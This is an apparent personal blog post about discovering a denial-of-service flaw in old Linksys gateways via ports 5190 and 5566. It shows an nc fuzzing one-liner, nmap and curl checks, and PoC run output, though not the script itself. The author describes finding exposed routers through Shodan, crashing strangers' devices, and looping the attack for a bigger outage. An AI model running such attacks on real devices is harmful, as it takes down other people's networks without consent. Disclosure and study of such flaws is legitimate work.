Two days ago I visited a friend of mine. I was showing him how to discover open ports in a network with nmap, and as an example I chose his home gateway. His gateway is/was a Linksys WAG54G, without updated firmware. Year 2009, more or less.
He was surprised when we discovered two weird open ports on the gateway: 5190 and 5566. He didn't have any port configured to be open, but I ignored that because I thought they were some private ports used to configure the gateway from a GUI in Windows or something similar.
We were talking and connecting to some ports for a while... and I figured out that the behaviour of port 5566 was different after connecting to port 5190. It was very odd.
If you connect to port 5566 you get an immediate disconnection, but if you make a connection to port 5190 first, port 5566 sits waiting for data in a lot of cases. Bye bye to the fast disconnection.
So, out of curiosity, I tried to fuzz the port with /dev/urandom... something similar to:
cat /dev/urandom | nc -v 192.168.1.1 5566
Meanwhile... while I was explaining to my friend how a protocol works, our internet connection went down.
BOOM! o_O
I said: "Ermmm... Let me try it again, buddy!" ...and...
BOOM! O_O
I had to go back home. On the way, I was thinking about the port issue.
At home, my first step was to see whether those ports were private or public... and BOOM! Public!
But I didn't have any Linksys router at home to try it again... so my friend Shodan came to the rescue! ;)
The next steps are very boring but, more or less, it was a huge trial-and-error process, and this was the PoC conclusion:
Ingredients:
- A very old Linksys: Shodan has a lot of them.
- Ports 5190 and 5566 open: Shodan has few of them, but it has them.
- Nmap to confirm some data.
Here we go:
$ nmap -sS -p 5190,5566 x.x.x.x
Starting Nmap 5.51 ( http://nmap.org ) at 2014-09-06 08:33 CEST
Nmap scan report for gateway (x.x.x.x)
Host is up (0.080s latency).
PORT STATE SERVICE
5190/tcp open aol
5566/tcp open westec-connect
Curl check:
$ curl -I -q --max-time 5 x.x.x.x
HTTP/1.1 401 Unauthorized
Server:
Date: Sat, 06 Sep 2014 06:31:53 GMT
WWW-Authenticate: Basic realm="Linksys WAG200G "
Content-Type: text/html
Connection: close
OK. Ingredients OK. We can run the PoC. Sometimes you need to run it twice or more. Honestly, I don't know why.
$ python OldLinksysMustDie.py x.x.x.x
OldLinksysMustDie v0.001b PoC
* Connecting to x.x.x.x...
* Cooking... be patient....
* On Fire!
><
><
><
[BYEBYE] Ooops! connection to the target lost. [BYEBYE]
Curl again:
curl -I -q --max-time 5 x.x.x.x
curl: (28) Operation timed out after 5001 milliseconds with 0 bytes received
And RAMBO was here! I tried other ones and... all temporarily dead!!
NOTE: The router recovers 5-10 minutes after running the PoC, but if you want a big DoS, a "loop" in the computer world is so easy..... ;)
Finally, my horrible PoC (horrible like my English) in Python:
Are you ready John?
Firmware affected: